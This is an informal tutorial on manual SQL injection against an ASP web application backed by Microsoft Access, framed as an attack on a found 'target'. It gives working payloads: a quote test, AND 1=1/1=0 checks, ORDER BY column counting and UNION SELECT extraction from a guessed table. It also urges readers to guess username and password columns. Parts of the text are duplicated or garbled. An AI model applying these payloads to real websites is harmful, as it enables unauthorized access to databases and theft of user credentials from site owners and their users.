MsSQL Injections
The first thing we need to figure out is, when is a site vulnerable to SQL injection or not?
We can do this a few ways, depending on what kind of SQL injection attack vector we have.
We can do this a few ways, depending on what kind of SQL injection attack vector we have.
Some examples how to figure out if it’s vulnerable or not for basic SQLi:
· Place an ‘ character behind the last part of the URL.
If you get something similar to the following errors:
· Microsoft Access ODBC drive
· Open quotation
· Microsoft Amos DB provider for Oracle
· Division by zero in
Now that we found our target, and we had the following error after our query:
We got an error like:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=563' ;'.
/en/includes/configdb.asp, line 23
Now that we see that we created an error, we want to make sure it’s vulnerable. Not all errors are a sign of a injection point.
Let’s continue our test by using the following query behind the number:
+AND+ 1=1#
Making it look like:
As we spoke before about the signs I’m only going to explain what ‘and 1=1’ is for, you know math (I hope haha). We simply check if 1 is equal is 1 if that’s true, it should show the page normally
Now we want to know if 1 equaling 0 is any problem for our target?
At my end it spilled out the following error:
ADODB.Field error '800a0bcd'
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 44
Which clearly shows our target is vulnerable! Which is great :).
Getting the amount of columns we do by the following query:
order by 10#
Which you should be familiar with, as I showed you in the basic SQL Injection tutorial!
My query resulted in:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 26
This can be seen as the same error of basic SQL Injection, now instead of saying unknown column “10” in clause or something similar it says: database engine does not recognize “10” as a valid field name or expression, telling us our columns are less than 10.
I changed from 10 columns to 7, which is giving me the correct result that I want:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in ORDER BY clause.
/en/includes/configdb.asp, line 26
This might seem like a complete failing error, but the page is loading, so I know I have 7 columns to work with, let’s try and show them on the page.
563+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,6,7# Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 26
I got this error spit out, basically telling us that it cannot complete our query without a database attached to our query, there for I will be GUESSING that my target has a column named: mxisgod PRESS RELEASES > 4 Date: JAN 2, 1900
Source:
Source:
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 0
Now again we use 1=0 to error it out to show our numbers onto the page, for me column number “4” showed up so I will use that to exploit further with.
As you see above in our target, we see the number 4 after the > sign, if you want to be 100% sure that it is a column that shows we can use: 4444444444 instead of a single 4, showing us a bigger range (doh). My query used: +and+1=0+union+all+select+1,2,3,4,5,6,7 from mxisgod# We ignore the error and go on! Now that we are guessing, we have to guess the rest of the columns within mxisgod too! Luckily for you this is an example made by me, but most websites have standard
names for their columns, like id – password – email, etc. Getting the info! Basically the same as normal SQL Injection for this example we have to use column “4” to get our info! +and+1=0+union+all+select+1,id,3,4,5,6,7 from mxisgod#
And that should get us a number, now you can move on by yourself and guess the rest! If your confused, try Googling for standard username / passwords for database columns!